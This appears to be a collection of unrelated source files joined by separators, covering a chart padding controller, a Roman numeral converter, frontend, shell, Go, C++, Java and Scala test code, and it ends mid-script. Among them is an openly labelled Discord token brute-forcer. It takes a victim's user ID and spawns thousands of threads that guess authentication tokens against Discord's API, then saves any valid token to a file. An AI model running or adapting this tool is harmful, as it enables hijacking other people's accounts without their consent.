bleeding[index] = bleeding[index](props);
}
});
}
this.bleeding = clone(bleeding);
// 参与auto padding的components: axis legend label annotation
var components_bbox = [new BBox(viewRange.minX, viewRange.minY, viewRange.width, viewRange.height)];
if (((_a = this.plot.config.coordinate) === null || _a === void 0 ? void 0 : _a.type) === 'cartesian') {
this._getCartesianAxis(view, components_bbox[0], components_bbox);
}
var box = this._mergeBBox(components_bbox);
this._getLegend(view, box, components_bbox);
box = this._mergeBBox(components_bbox);
// 参与auto padding的自定义组件
var components = this.innerPaddingComponents;
each(components, function (obj) {
var component = obj;
var bbox = component.getBBox();
components_bbox.push(bbox);
});
box = this._mergeBBox(components_bbox);
var padding = [
minY - box.minY + this.bleeding[0],
box.maxX - maxX + this.bleeding[1],
box.maxY - maxY + this.bleeding[2],
minX - box.minX + this.bleeding[3],
];
// label、annotation等
var panelPadding = this._getPanel(view);
padding[0] += panelPadding[0];
padding[1] += panelPadding[1];
padding[2] += panelPadding[2];
padding[3] += panelPadding[3];
return padding;
};
PaddingController.prototype._getCartesianAxis = function (view, globalBBox, bboxes) {
var axes = getAxisComponents(view);
var isTransposed = view.getCoordinate().isTransposed;
each(axes, function (axis) {
if (axis.get('group').get('children').length === 0) {
return;
}
var position = axis.get('position');
var _a = axis.getLayoutBBox(), minX = _a.minX, minY = _a.minY, width = _a.width, height = _a.height;
if (!isTransposed) {
if (position === 'left') {
bboxes.push(new BBox(globalBBox.minX - width, minY, width, height));
}
else if (position === 'bottom') {
bboxes.push(new BBox(minX, globalBBox.maxY, width, height));
}
else if (position === 'right') {
bboxes.push(new BBox(globalBBox.maxX, minY, width, height));
}
}
else {
if (position === 'bottom') {
bboxes.push(new BBox(globalBBox.minX - width, minY, width, height));
}
else if (position === 'left') {
bboxes.push(new BBox(minX, globalBBox.maxY, width, height));
}
else if (position === 'top') {
bboxes.push(new BBox(globalBBox.maxX, minY, width, height));
}
}
});
};
PaddingController.prototype._getLegend = function (view, globalBBox, bboxes) {
var legends = getLegendComponents(view);
each(legends, function (legend) {
var position = legend.get('position').split('-')[0];
var _a = legend.getLayoutBBox(), minX = _a.minX, minY = _a.minY, width = _a.width, height = _a.height;
if (position === 'top') {
bboxes.push(new BBox(minX, globalBBox.minY - height, width, height));
}
else if (position === 'bottom') {
bboxes.push(new BBox(minX, globalBBox.maxY, width, height));
}
else if (position === 'left') {
bboxes.push(new BBox(globalBBox.minX - width, minY, width, height));
}
else {
bboxes.push(new BBox(globalBBox.maxX, minY, width, height));
}
});
};
PaddingController.prototype._getPanel = function (view) {
var groups = [];
var geoms = view.geometries;
each(geoms, function (geom) {
if (geom.labelsContainer) {
groups.push(geom.labelsContainer);
}
});
var minX = Infinity;
var maxX = -Infinity;
var minY = Infinity;
var maxY = -Infinity;
each(groups, function (group) {
var children = group.get('children');
children.forEach(function (child) {
if (child.type === 'group' && child.get('children').length === 0) {
return;
}
var bbox = child.getBBox();
if (bbox.minX < minX) {
minX = bbox.minX;
}
if (bbox.maxX > maxX) {
maxX = bbox.maxX;
}
if (bbox.minY < minY) {
minY = bbox.minY;
}
if (bbox.maxY > maxY) {
maxY = bbox.maxY;
}
});
});
var panelRange = view.coordinateBBox;
//right
var rightDist = Math.max(maxX - parseFloat(panelRange.maxX), 0);
if (rightDist > 0) {
var ratio = panelRange.width / (panelRange.width + rightDist);
rightDist *= ratio;
}
//left
var leftDist = Math.max(parseFloat(panelRange.minX) - minX, 0);
if (leftDist > 0) {
var ratio = panelRange.width / (panelRange.width + leftDist);
leftDist *= ratio;
}
//top
var topDist = Math.max(parseFloat(panelRange.minY) - minY, 0);
if (topDist > 0) {
var ratio = panelRange.height / (panelRange.height + topDist);
topDist *= ratio;
}
//bottom
var bottomDist = Math.max(maxY - parseFloat(panelRange.maxY), 0);
if (bottomDist > 0) {
var ratio = panelRange.height / (panelRange.height + bottomDist);
bottomDist *= ratio;
}
return [topDist, rightDist, bottomDist, leftDist];
};
PaddingController.prototype._mergeBBox = function (bboxes) {
var minX = Infinity;
var maxX = -Infinity;
var minY = Infinity;
var maxY = -Infinity;
each(bboxes, function (bbox) {
var box = bbox;
minX = Math.min(box.minX, minX);
maxX = Math.max(box.maxX, maxX);
minY = Math.min(box.minY, minY);
maxY = Math.max(box.maxY, maxY);
});
return { minX: minX, maxX: maxX, minY: minY, maxY: maxY };
};
return PaddingController;
}());
export default PaddingController;
//# sourceMappingURL=padding.js.map
|
# Create a dictionary to easily access the numeric values of the Roman Numerals
ROMAN_NUMERALS = {'I': 1,'IV': 4,'V': 5,'IX': 9,'X': 10,'XL': 40,'L': 50,'XC': 90,'C': 100,'CD': 400,'D': 500,'CM': 900,'M': 1000}
# Create a function to convert Roman numerals to numbers
def convertRomanToNumber(numeral):
number = 0
i = 0
while i < len(numeral):
s1 = ROMAN_NUMERALS[numeral[i]]
# If next character is greater than current char, generate value
if i+1 < len(numeral):
s2 = ROMAN_NUMERALS[numeral[i+1]]
# Add current char if lower
if s1 >= s2:
number = number + s1
i = i + 1
else:
number = number + s2 - s1
i = i + 2
else:
number = number + s1
i = i + 1
return number
# Main function to convert Roman Numerals to numbers
def romanToInt(numeral):
if numeral == "I":
print(1)
elif numeral == "II":
print(2)
else:
print(convertRomanToNumber(numeral))
# Call the main function to convert from I to MMXXVII
romanToInt("I")
romanToInt("II")
romanToInt("MMXXVII")
|
import React from 'react'
import styled from '@emotion/styled/macro'
import mq from 'mediaQuery'
import { hasNonAscii } from '../../utils/utils'
const MainContainer = styled('main')`
width: 100%;
padding: 20px 100px 0px 30px;
@media (max-width: 768px) {
padding: 50px 25px 0px 25px;
}
`
const Main = ({ children }) => (
<MainContainer hasNonAscii={hasNonAscii()}>{children}</MainContainer>
)
export default Main
|
import 'jquery'
import 'materialize-css'
import '../node_modules/materialize-css/dist/css/materialize.css'
import Map from './map'
import './styles/styles.css'
if (module.hot) {
module.hot.accept();
}
const map = new Map()
const inputRefCat = document.getElementById('navRefCatForm')
const toolMeasure = document.getElementById('tool-measure')
const toolLocate = document.getElementById('tool-locate')
const refCatSearch = () => {
var refcat = document.getElementById('txt-refcat').value
map.descargaParcela(refcat)
}
/* Previene que al pulsar intro se refresque la web y dispara el evento click */
inputRefCat.addEventListener('keypress', (e) => {
if (e.which == 13) {
e.preventDefault()
refCatSearch()
}
})
toolMeasure.addEventListener('click', (e) => {
if (e.target.checked){
map.activaMedidor()
} else {
map.desactivaMedidor()
}
})
toolLocate.addEventListener('change', (e) => {
map.activaLocation()
})
$(".button-collapse").sideNav({
menuWidth: 250
})
$('.datepicker').pickadate({
labelMonthNext: 'Mes siguiente',
labelMonthPrev: 'Mes anterior',
labelMonthSelect: 'Selecciona un mes',
labelYearSelect: 'Selecciona un año',
monthsFull: [ 'Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre' ],
monthsShort: [ 'Ene', 'Feb', 'Mar', 'Abr', 'May', 'Jun', 'Jul', 'Ago', 'Sep', 'Oct', 'Nov', 'Dic' ],
weekdaysFull: [ 'Domingo', 'Lunes', 'Martes', 'Miércoles', 'Jueves', 'Viernes', 'Sábado' ],
weekdaysShort: [ 'Dom', 'Lun', 'Mar', 'Mie', 'Jue', 'Vie', 'Sab' ],
weekdaysLetter: [ 'D', 'L', 'M', 'X', 'J', 'V', 'S' ],
today: 'Hoy',
clear: 'Limpiar',
close: 'Cerrar',
format: 'dd/mm/yyyy',
selectMonths: true,
selectYears: 15,
container: document.body,
onSet: function(e) {
/* Comprobamos que lo que setea el pickadate es un fecha o clear */
if (e.hasOwnProperty("select") || e.hasOwnProperty("clear")){
var dateString = this.get('select', 'yyyy-mm-dd')
map.catastroHistorico(dateString)
this.close()
}
}
})
$('.modal').modal();
|
OPS_MGR_PASSWD=$1
mkdir -p decrypted 2>/dev/null
cd decrypted
ruby ../eos.rb decrypt $OPS_MGR_PASSWD ../installation.yml decrypted-installation.yml
ruby ../eos.rb decrypt $OPS_MGR_PASSWD ../actual-installation.yml decrypted-actual-installation.yml
cd ..
|
<filename>setup_test.go<gh_stars>10-100
package restic
import (
"testing"
"github.com/caddyserver/caddy"
"github.com/caddyserver/caddy/caddyhttp/httpserver"
)
func TestSetup(t *testing.T) {
c := caddy.NewTestController("http", `restic /basepath`)
err := setup(c)
if err != nil {
t.Fatalf("Expected no errors, got: %v", err)
}
mids := httpserver.GetConfig(c).Middleware()
if len(mids) == 0 {
t.Fatal("Expected middleware, had 0 instead")
}
handler := mids[0](httpserver.EmptyNext)
myHandler, ok := handler.(ResticHandler)
if !ok {
t.Fatalf("Expected handler to be type ResticHandler, got: %#v", handler)
}
if myHandler.BasePath != "/basepath" {
t.Error("Expected base path to be /basepath")
}
if !httpserver.SameNext(myHandler.Next, httpserver.EmptyNext) {
t.Error("'Next' field of handler was not set properly")
}
}
func TestExtParse(t *testing.T) {
tests := []struct {
inputStr string
shouldErr bool
expectedBasePath string
}{
{`restic`, false, "/"},
{`restic /basepath`, false, "/basepath"},
{`restic /basepath /backups`, false, "/basepath"},
{`restic /basepath /backups extra`, true, "/basepath"},
}
for i, test := range tests {
c := caddy.NewTestController("http", test.inputStr)
err := setup(c)
if err == nil && test.shouldErr {
t.Errorf("Test %d didn't error, but it should have", i)
} else if err != nil && !test.shouldErr {
t.Errorf("Test %d errored, but it shouldn't have; got '%v'", i, err)
}
if test.shouldErr {
continue
}
mids := httpserver.GetConfig(c).Middleware()
if len(mids) == 0 {
t.Fatalf("Test %d: Expected middleware, had 0 instead", i)
}
handler := mids[0](httpserver.EmptyNext)
myHandler, ok := handler.(ResticHandler)
if !ok {
t.Fatalf("Expected handler to be type ResticHandler, got: %#v", handler)
}
if test.expectedBasePath != myHandler.BasePath {
t.Errorf("Test %d: Expected base path to be %s but was %s", i, test.expectedBasePath, myHandler.BasePath)
}
}
}
|
const Sequelize = require('sequelize')
const sequelize = require('../database')
const Player = sequelize.define(
'player',
{
brawlhalla_id: {
type: Sequelize.INTEGER.UNSIGNED,
primaryKey: true,
},
name: Sequelize.STRING,
xp: Sequelize.INTEGER.UNSIGNED,
level: Sequelize.INTEGER.UNSIGNED,
rank: Sequelize.INTEGER.UNSIGNED,
tier: Sequelize.STRING,
games: Sequelize.INTEGER.UNSIGNED,
wins: Sequelize.INTEGER.UNSIGNED,
rating: Sequelize.INTEGER.UNSIGNED,
peak_rating: Sequelize.SMALLINT.UNSIGNED,
ranked_games: Sequelize.MEDIUMINT.UNSIGNED,
ranked_wins: Sequelize.MEDIUMINT.UNSIGNED,
region: Sequelize.STRING,
legend1: Sequelize.INTEGER.UNSIGNED,
legend2: Sequelize.INTEGER.UNSIGNED,
legend3: Sequelize.INTEGER.UNSIGNED,
lastupdated: Sequelize.INTEGER.UNSIGNED,
},
{
indexes: [
{
fields: ['rank'],
},
],
}
)
module.exports = Player
|
<filename>Renderer.cpp<gh_stars>1-10
//
// Renderer.cpp
// walls3d
//
// Created by <NAME> on 5/12/20.
// Copyright © 2020 <NAME>. All rights reserved.
//
#include <string.h>
#include "Renderer.hpp"
#include "GeomUtils.hpp"
#include "Utils.hpp"
constexpr uint8_t Renderer::ditherPattern8bit[];
Renderer::Renderer(uint8_t* pPixelBuf,
uint8_t screenWidth,
uint8_t screenHeight,
ColRenderedCbType colRenderedCb,
const Camera& camera):
pPixelBuf{pPixelBuf},
screenWidth{screenWidth},
screenHeight{screenHeight},
colRenderedCb{colRenderedCb},
camera{camera}
{
}
void Renderer::BeginRender()
{
}
void Renderer::EndRender()
{
}
double Renderer::GetColumnHeightByDistance(double dist)
{
return (30.0f / dist * static_cast<double>(screenHeight));
}
void Renderer::RenderColumn(uint32_t screenX, uint8_t height)
{
double y1Float {static_cast<double>(screenHeight / 2) - (height / 2)};
uint8_t y1 {static_cast<uint8_t>(Rast(y1Float))};
uint8_t y2 {static_cast<uint8_t>(Rast(y1Float + height))};
// figure out where in the pixel buffer to start, and only do
// additions from there (avoid multiplication in the drawing loop)
size_t pixelBufferOffset = 0;
// draw a vertical line all the way through the column
uint8_t ditherPatternIndex = (8 * height / screenHeight);
if (ditherPatternIndex > 7) ditherPatternIndex = 7;
static uint8_t ditherPatternOffset = 0;
uint16_t ditherPattern8 = ditherPattern8bit[ditherPatternIndex];
uint16_t ditherPattern16 = (ditherPattern8 << 8) | ditherPattern8;
uint8_t ditherPatternFinal = ditherPattern16 >> (ditherPatternOffset % 8);
ditherPatternOffset += 5; // a weird odd/prime number here that doesn't easily match up with 8 makes for less pattern-y artifacts
uint8_t pixel;
uint8_t y = 0;
uint8_t screenHeightPages = screenHeight / 8;
for (uint8_t pageNum = 0; pageNum < screenHeightPages; pageNum++)
{
uint8_t pageData = 0;
for (uint8_t i = 0; i < 8; i++)
{
if (y >= y1 && y < y2)
pixel = 1;
else
pixel = 0;
pageData |= (pixel << i);
y++;
}
pageData &= ditherPatternFinal;
pPixelBuf[pixelBufferOffset] = pageData;
pixelBufferOffset++;
}
colRenderedCb();
}
// maps a range of [0.0, 1.0] to [0, rangeHigh]
// clamps at rangeHigh to account for floating point error
uint32_t Renderer::MapPercentageToRange(double percentage, uint32_t rangeHigh)
{
uint32_t retVal {static_cast<uint32_t>(percentage * static_cast<double>(rangeHigh + 1))};
if (retVal > rangeHigh) retVal = rangeHigh;
return retVal;
}
uint8_t Renderer::GetClippedHeight(double height)
{
return static_cast<uint8_t>(Rast(height < screenHeight ? height : screenHeight));
}
|
#!/bin/bash
#SBATCH --time=90:55:00
#SBATCH --account=vhs
#SBATCH --job-name=sea_mem_4n_6t_6d_1000f_617m_15i
#SBATCH --nodes=4
#SBATCH --nodelist=comp02,comp03,comp04,comp06
#SBATCH --output=./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/slurm-%x-%j.out
source /home/vhs/Sea/.venv/bin/activate
export SEA_HOME=/home/vhs/Sea
srun -N4 rm -rf /disk0/vhs/seatmp /disk1/vhs/seatmp /disk2/vhs/seatmp /disk3/vhs/seatmp /disk4/vhs/seatmp /disk5/vhs/seatmp /dev/shm/seatmp
srun -N4 echo "Clearing cache" && sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
echo "Creating temp source mount directories"
srun -N4 mkdir /dev/shm/seatmp
srun -N4 mkdir /disk0/vhs/seatmp /disk1/vhs/seatmp /disk2/vhs/seatmp /disk3/vhs/seatmp /disk4/vhs/seatmp /disk5/vhs/seatmp
start=`date +%s.%N`
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n0_sea_parallel.sh &
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n1_sea_parallel.sh &
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n2_sea_parallel.sh &
srun -N 1 bash ${SEA_HOME}/bin/sea_launch.sh ./results/exp_iterations_sea/run-0/sea_mem_4n_6t_6d_1000f_617m_15i/n3_sea_parallel.sh &
wait
end=`date +%s.%N`
runtime=$( echo "$end - $start" | bc -l )
echo "Runtime: $runtime"
echo "Removing directories"
srun -N4 rm -rf /disk0/vhs/seatmp /disk1/vhs/seatmp /disk2/vhs/seatmp /disk3/vhs/seatmp /disk4/vhs/seatmp /disk5/vhs/seatmp /dev/shm/seatmp
|
<!DOCTYPE html>
<html>
<head>
<title>Table Example</title>
</head>
<body>
<h1>Table Heading</h1>
<table>
<tr>
<th>Name</th>
<th>Age</th>
</tr>
<tr>
<td>John</td>
<td>25</td>
</tr>
<tr>
<td>Alice</td>
<td>29</td>
</tr>
<tr>
<td>Bob</td>
<td>22</td>
</tr>
</table>
</body>
</html>
|
package br.com.alinesolutions.anotaai.model.produto;
import javax.persistence.Entity;
import javax.persistence.EnumType;
import javax.persistence.Enumerated;
import javax.persistence.ManyToOne;
import javax.persistence.NamedQueries;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.annotations.SQLDelete;
import org.hibernate.annotations.Where;
import br.com.alinesolutions.anotaai.metadata.model.domain.StatusMovimentacao;
import br.com.alinesolutions.anotaai.model.BaseEntity;
@NamedQueries({
})
@Entity
@Where(clause = "ativo = true")
@SQLDelete(sql = "update MovimentacaoProduto set ativo = false where id = ?")
@XmlRootElement
public class MovimentacaoProduto extends BaseEntity<Long, MovimentacaoProduto> {
private static final long serialVersionUID = 1L;
@NotNull
@Min(value = 1L)
private Long quantidade;
@NotNull
@ManyToOne(cascade = {})
private Produto produto;
@NotNull
@Enumerated(EnumType.ORDINAL)
private StatusMovimentacao statusMovimentacao;
public Long getQuantidade() {
return quantidade;
}
public void setQuantidade(Long quantidade) {
this.quantidade = quantidade;
}
public Produto getProduto() {
return produto;
}
public void setProduto(Produto produto) {
this.produto = produto;
}
public StatusMovimentacao getStatusMovimentacao() {
return statusMovimentacao;
}
public void setStatusMovimentacao(StatusMovimentacao statusMovimentacao) {
this.statusMovimentacao = statusMovimentacao;
}
}
|
import discord
import string
import requests as req
import datetime
import random
import time
import base64
from threading import Thread as thr
import os
from colorama import Fore
import discord, os, json
from discord.ext import commands
from discord.ext.commands import Bot
from plyer import notification
os.system(f'title Discord Token Brute force By Naoy ^| Version : 1.2')
TOKEN = input(f"[>] Your token : ")
os.system('cls')
def notifyMe(title, message):
notification.notify(
title = title,
message = message,
app_icon="./nitro.ico",
)
class MyClient(discord.Client):
async def on_ready(self):
userid = input(f"[{Fore.RED}>{Fore.RESET}] Victim's ID : ")
user = await client.fetch_user(int(userid))
stamp = user.created_at
timestamp = str(time.mktime(stamp.timetuple()))
print(timestamp)
encodedBytes = base64.b64encode(userid.encode("utf-8"))
encodedid = str(encodedBytes, "utf-8")
encodedBytes = base64.b64encode(timestamp.encode("utf-8"))
encodedstamp = str(encodedBytes, "utf-8")
print(f"{Fore.WHITE}Attempting to crack {Fore.YELLOW}{user}{Fore.WHITE}'s token")
time.sleep(3)
for i in range(10000):
thr(target = gen, args = (encodedid, encodedstamp)).start()
def gen(encodedid, encodedstamp):
while True:
second = ('').join(random.choices(string.ascii_letters + string.digits + "-" + "_", k=6))
end = ('').join(random.choices(string.ascii_letters + string.digits + "-" + "_", k=27))
token = f"{encodedid}.{second}.{end}"
headers = {'Content-Type': 'application/json', 'authorization': token}
url = "https://discordapp.com/api/v6/users/@me/library"
r = req.get(url, headers=headers)
if r.status_code == 200:
print(f'{Fore.WHITE}{token} {Fore.BLACK}: {Fore.GREEN}Valid')
notifyMe("Token Finder", f"Le token de {user} Just Found The Token")
f = open("token.txt", "a")
f.write(token)
f.close()
exit(0)
else:
print(f'{Fore.WHITE}{token} {Fore.BLACK}: {Fore.RED}Invalid')
token = os.environ.get(TOKEN)
client = MyClient()
client.run(TOKEN, bot=False,)
|
package com.landawn.projecteuler._100;
import static org.junit.Assert.assertEquals;
import org.junit.Test;
import com.landawn.abacus.util.N;
import com.landawn.projecteuler.TestBase;
/**
*
* @see <a href="https://projecteuler.net/problem=4">Largest palindrome product</a>
*
*/
public class _004 extends TestBase {
@Override
@Test
public void s_1() {
int result = 0;
for (int p = 990; p > 99; p -= 11) {
for (int q = 999; q > 99; q--) {
int t = p * q;
if (result < t && isPalindrome(t)) {
result = t;
break;
} else if (t < result) {
break;
}
}
}
N.println(result);
assertEquals(998899, result);
}
@Override
@Test
public void s_2() {
int max = 100001;
for (int i = 999; i >= 100; i--) {
if (max >= i * 999) {
break;
}
for (int j = 999; j >= i; j--) {
int p = i * j;
if (max < p && isPalindrome(p)) {
max = p;
}
}
}
N.println(max);
}
}
|
#!/bin/bash
AWS_REGION=$(jq -r '.stack.region' ./package.json)
echo "==Attempting to add service role to Amazon Elasticsearch in region $REGION=="
$(aws iam create-service-linked-role --region $AWS_REGION --aws-service-name es.amazonaws.com && echo "Service role successfully added") || echo "Service role already exists"
|
#!/usr/bin/env bash
python3 setup.py sdist bdist_wheel
twine upload dist/*
|
<reponame>shrishankit/prisma<filename>server/servers/api/src/test/scala/com/prisma/api/schema/MutationsSchemaBuilderSpec.scala
package com.prisma.api.schema
import com.prisma.api.ApiSpecBase
import com.prisma.shared.schema_dsl.{SchemaDsl, TestProject}
import com.prisma.util.GraphQLSchemaMatchers
import org.scalatest.{FlatSpec, Matchers}
import sangria.renderer.SchemaRenderer
class MutationsSchemaBuilderSpec extends FlatSpec with Matchers with ApiSpecBase with GraphQLSchemaMatchers {
val schemaBuilder = testDependencies.apiSchemaBuilder
"the create Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("createTodo(data: TodoCreateInput!): Todo!")
schema should containInputType("TodoCreateInput", fields = Vector("title: String!", "tag: String"))
}
"the create Mutation for a model with relations" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| comments: [Comment] @relation(name:"TodoComments" $listInlineArgument)
| topComment: Comment! @relation(link: INLINE, name: "TopComments")
|}
|
|type Comment {
| id: ID! @id
| text: String!
| todo: Todo @relation(name:"TodoComments")
| topCommentFor: Todo! @relation(name:"TopComments")
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
// from Todo to Comment
schema should containMutation("createTodo(data: TodoCreateInput!): Todo!")
schema should containInputType(
"TodoCreateInput",
fields = Vector(
"title: String!",
"tag: String",
"comments: CommentCreateManyWithoutTodoInput",
"topComment: CommentCreateOneWithoutTopCommentForInput!"
)
)
schema should containInputType("CommentCreateManyWithoutTodoInput",
fields = Vector(
"create: [CommentCreateWithoutTodoInput!]",
"connect: [CommentWhereUniqueInput!]"
))
schema should containInputType("CommentCreateWithoutTodoInput", fields = Vector("text: String!"))
// from Comment to Todo
schema should containInputType("CommentCreateInput",
fields = Vector(
"text: String!",
"todo: TodoCreateOneWithoutCommentsInput"
))
schema should containInputType("TodoCreateOneWithoutCommentsInput",
fields = Vector(
"create: TodoCreateWithoutCommentsInput",
"connect: TodoWhereUniqueInput"
))
schema should containInputType("TodoCreateWithoutCommentsInput",
fields = Vector(
"title: String!",
"tag: String"
))
}
"the update Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| alias: String @unique
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("updateTodo(data: TodoUpdateInput!, where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoUpdateInput",
fields = Vector(
"title: String",
"alias: String"
))
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID",
"alias: String"
))
}
"the update Mutation for a model with a optional backrelation" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type List {
| id: ID! @id
| listUnique: String! @unique
| optList: String
| todoes: [Todo] $listInlineDirective
|}
|
|type Todo {
| id: ID! @id
| todoUnique: String! @unique
| optString: String
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("updateTodo(data: TodoUpdateInput!, where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoCreateInput",
fields = Vector(
"todoUnique: String!",
"optString: String"
))
schema should containInputType("TodoUpdateInput",
fields = Vector(
"todoUnique: String",
"optString: String"
))
schema should containInputType("TodoUpdateDataInput",
fields = Vector(
"todoUnique: String",
"optString: String"
))
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID",
"todoUnique: String"
))
schema should containInputType("TodoUpdateWithWhereUniqueNestedInput",
fields = Vector(
"where: TodoWhereUniqueInput!",
"data: TodoUpdateDataInput!"
))
schema should containInputType("TodoUpsertWithWhereUniqueNestedInput",
fields = Vector(
"where: TodoWhereUniqueInput!",
"update: TodoUpdateDataInput!",
"create: TodoCreateInput!"
))
}
"the update Mutation for a model with relations" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| comments: [Comment] $listInlineDirective
|}
|
|type Comment {
| id: ID! @id
| text: String!
| todo: Todo
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
// from Todo to Comment
schema should containMutation("updateTodo(data: TodoUpdateInput!, where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoUpdateInput",
fields = Vector(
"title: String",
"tag: String",
"comments: CommentUpdateManyWithoutTodoInput"
))
schema should containInputType(
"CommentUpdateManyWithoutTodoInput",
fields = Vector(
"create: [CommentCreateWithoutTodoInput!]",
"connect: [CommentWhereUniqueInput!]",
"disconnect: [CommentWhereUniqueInput!]",
"delete: [CommentWhereUniqueInput!]",
"update: [CommentUpdateWithWhereUniqueWithoutTodoInput!]",
"upsert: [CommentUpsertWithWhereUniqueWithoutTodoInput!]"
)
)
schema should containInputType("CommentCreateWithoutTodoInput",
fields = Vector(
"text: String!"
))
schema should containInputType("CommentUpdateWithWhereUniqueWithoutTodoInput",
fields = Vector(
"where: CommentWhereUniqueInput!",
"data: CommentUpdateWithoutTodoDataInput!"
))
schema should containInputType("CommentUpdateWithoutTodoDataInput",
fields = Vector(
"text: String"
))
schema should containInputType(
"CommentUpsertWithWhereUniqueWithoutTodoInput",
fields = Vector(
"where: CommentWhereUniqueInput!",
"update: CommentUpdateWithoutTodoDataInput!",
"create: CommentCreateWithoutTodoInput!"
)
)
// from Comment to Todo
schema should containInputType("CommentUpdateInput",
fields = Vector(
"text: String",
"todo: TodoUpdateOneWithoutCommentsInput"
))
schema should containInputType(
"TodoUpdateOneWithoutCommentsInput",
fields = Vector(
"create: TodoCreateWithoutCommentsInput",
"connect: TodoWhereUniqueInput",
"disconnect: Boolean",
"delete: Boolean",
"update: TodoUpdateWithoutCommentsDataInput"
)
)
schema should containInputType("TodoCreateWithoutCommentsInput",
fields = Vector(
"title: String!",
"tag: String"
))
schema should containInputType("TodoUpdateWithoutCommentsDataInput",
fields = Vector(
"title: String",
"tag: String"
))
}
"the update and upsert Mutation for a model with omitted back relation" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
s"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| comments: [Comment] $listInlineDirective
|}
|
|type Comment {
| id: ID! @id
| text: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containInputType(
"CommentUpdateManyInput",
fields = Vector(
"create: [CommentCreateInput!]",
"connect: [CommentWhereUniqueInput!]",
"disconnect: [CommentWhereUniqueInput!]",
"delete: [CommentWhereUniqueInput!]",
"update: [CommentUpdateWithWhereUniqueNestedInput!]",
"upsert: [CommentUpsertWithWhereUniqueNestedInput!]"
)
)
}
"the upsert Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("upsertTodo(where: TodoWhereUniqueInput!, create: TodoCreateInput!, update: TodoUpdateInput!): Todo!")
}
"the delete Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("deleteTodo(where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID"
))
}
"the delete Mutation for a model" should "be generated correctly and contain all non-list unique fields" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
| tag: String
| unique: Int @unique
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("deleteTodo(where: TodoWhereUniqueInput!): Todo")
schema should containInputType("TodoWhereUniqueInput",
fields = Vector(
"id: ID",
"unique: Int"
))
}
"the deleteMany Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("deleteManyTodoes(where: TodoWhereInput): BatchPayload!")
schema should containInputType("TodoWhereInput")
}
"the updateMany Mutation for a model" should "be generated correctly" in {
val project = SchemaDsl.fromStringV11() {
"""
|type Todo {
| id: ID! @id
| title: String!
|}
""".stripMargin
}
val schema = SchemaRenderer.renderSchema(schemaBuilder(project))
schema should containMutation("updateManyTodoes(data: TodoUpdateManyMutationInput!, where: TodoWhereInput): BatchPayload!")
schema should containInputType("TodoWhereInput")
}
"the executeRaw mutation" should "be there if raw access is enabled" in {
val project = TestProject.emptyV11
val schemaBuilder = SchemaBuilderImpl(project, enableRawAccess = true)
val schema = SchemaRenderer.renderSchema(schemaBuilder.build())
schema should containMutation("executeRaw(database: PrismaDatabase, query: String!): Json")
}
"the executeRaw mutation" should "not be there if raw access is disabled" in {
val project = TestProject.emptyV11
val schemaBuilder = SchemaBuilderImpl(project, enableRawAccess = false)
val schema = SchemaRenderer.renderSchema(schemaBuilder.build())
schema should not(containMutation("executeRaw(database: PrismaDatabase, query: String!): Json"))
}
}
|
<gh_stars>0
import styled from 'styled-components';
import {FixedSizeList} from 'react-window';
import {fontPolyglot} from '../../../styles/polyglot.js';
const List = styled(FixedSizeList)`${fontPolyglot}`;
export {List};
|
#!/usr/bin/env bash
# Deploy VMOP to the given cluster
#
# Usage:
